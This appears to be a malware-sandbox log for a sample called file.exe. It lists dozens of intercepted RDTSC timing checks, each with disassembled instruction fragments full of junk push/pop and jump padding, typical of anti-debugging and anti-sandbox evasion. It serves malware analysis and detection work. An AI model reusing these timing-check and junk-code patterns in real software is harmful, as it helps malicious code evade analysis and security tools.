Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772718 second address: 77273E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FEFB9679B69h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77273E second address: 772756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772F0D second address: 772F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7732FD second address: 773301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773301 second address: 773307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773307 second address: 75B3A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2A0Eh] 0x00000012 mov ecx, edi 0x00000014 call dword ptr [ebp+122D1D87h] 0x0000001a push edx 0x0000001b jmp 00007FEFB8B6DE61h 0x00000020 jl 00007FEFB8B6DE5Ch 0x00000026 pop edx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FEFB8B6DE5Eh 0x0000002e push eax 0x0000002f pop eax 0x00000030 jc 00007FEFB8B6DE56h 0x00000036 popad 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC77F second address: 7AC783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC783 second address: 7AC7E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEFB8B6DE5Fh 0x0000000e jne 00007FEFB8B6DE58h 0x00000014 jl 00007FEFB8B6DE5Eh 0x0000001a jns 00007FEFB8B6DE56h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEFB8B6DE60h 0x0000002b jmp 00007FEFB8B6DE68h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC7E8 second address: 7AC7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC7EC second address: 7AC7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC7F5 second address: 7AC7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4AF8 second address: 7B4B16 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEFB8B6DE56h 0x00000008 jmp 00007FEFB8B6DE64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4C8E second address: 7B4CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B66h 0x00000007 jmp 00007FEFB9679B63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FEFB9679B69h 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4CDF second address: 7B4CE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5111 second address: 7B5115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5115 second address: 7B5130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5130 second address: 7B514E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEFB9679B56h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEFB9679B5Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B514E second address: 7B5158 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEFB8B6DE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B527A second address: 7B52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEFB9679B68h 0x0000000a jmp 00007FEFB9679B5Ch 0x0000000f push esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B575B second address: 7B5764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B58EE second address: 7B58F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B58F2 second address: 7B5907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007FEFB8B6DE79h 0x0000000d jo 00007FEFB8B6DE5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD681 second address: 7BD685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C00A0 second address: 7C00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C00A6 second address: 7C00AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C00AC second address: 7C00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FEFB8B6DE5Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFE18 second address: 7BFE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FEFB9679B56h 0x0000000e jnp 00007FEFB9679B56h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C17BF second address: 7C17CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEFB8B6DE5Eh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6635 second address: 7C6648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6648 second address: 7C6666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FEFB8B6DE64h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6666 second address: 7C6670 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEFB9679B62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C67BC second address: 7C67C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6920 second address: 7C693D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 jmp 00007FEFB9679B5Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C693D second address: 7C6941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6941 second address: 7C6957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Ch 0x00000007 jne 00007FEFB9679B56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6957 second address: 7C6963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007FEFB8B6DE56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6A7F second address: 7C6A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6A83 second address: 7C6A96 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEFB8B6DE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jng 00007FEFB8B6DE56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6A96 second address: 7C6AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FEFB9679B56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6D79 second address: 7C6D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6D7F second address: 7C6D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6D84 second address: 7C6DA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEFB8B6DE56h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FEFB8B6DE58h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6DA4 second address: 7C6DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C6DA8 second address: 7C6DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772CE0 second address: 772D55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FEFB9679B56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FEFB9679B58h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+12483BEAh] 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FEFB9679B58h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 sbb dl, FFFFFFC8h 0x0000004c add eax, ebx 0x0000004e or edx, 587BBF8Fh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FEFB9679B5Eh 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772D55 second address: 772D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7270F3 second address: 7270F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7270F7 second address: 727107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 727107 second address: 727111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 727111 second address: 72712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7B07 second address: 7C7B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7B0B second address: 7C7B1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEFB8B6DE56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7B1A second address: 7C7B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7B21 second address: 7C7B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C7B27 second address: 7C7B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Eh 0x00000007 jmp 00007FEFB9679B65h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FEFB9679B5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBC66 second address: 7CBC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBC71 second address: 7CBC77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBC77 second address: 7CBC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE60h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBC8D second address: 7CBC98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CBC98 second address: 7CBC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEE9E second address: 7CEEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEEA4 second address: 7CEEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEEA8 second address: 7CEEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEEBD second address: 7CEEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF033 second address: 7CF043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF043 second address: 7CF049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF049 second address: 7CF04F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF04F second address: 7CF053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF053 second address: 7CF05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF05C second address: 7CF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF1AD second address: 7CF1DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Dh 0x00000007 jmp 00007FEFB9679B63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007FEFB9679B56h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF492 second address: 7CF4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE65h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF4B5 second address: 7CF4D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FEFB9679B60h 0x0000000e jno 00007FEFB9679B56h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72C229 second address: 72C22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D54B4 second address: 7D54B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D54B8 second address: 7D54C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEFB8B6DE56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5D7C second address: 7D5D9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FEFB9679B66h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D60B7 second address: 7D60C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEFB8B6DE58h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB3B1 second address: 7DB3C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FEFB9679B56h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA754 second address: 7DA75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA75D second address: 7DA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA761 second address: 7DA76B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEFB8B6DE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DAB2B second address: 7DAB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DAB2F second address: 7DAB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FEFB8B6DE56h 0x0000000f jmp 00007FEFB8B6DE5Eh 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB091 second address: 7DB09C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FEFB9679B56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB09C second address: 7DB0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFC1B second address: 7DFC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5736 second address: 7E573F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E573F second address: 7E574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB9679B5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E574F second address: 7E5791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEFB8B6DE69h 0x0000000e jo 00007FEFB8B6DE62h 0x00000014 jc 00007FEFB8B6DE56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5791 second address: 7E57B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 js 00007FEFB9679B56h 0x0000000d jmp 00007FEFB9679B61h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5BCE second address: 7E5BE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEFB8B6DE64h 0x0000000b rdtsc
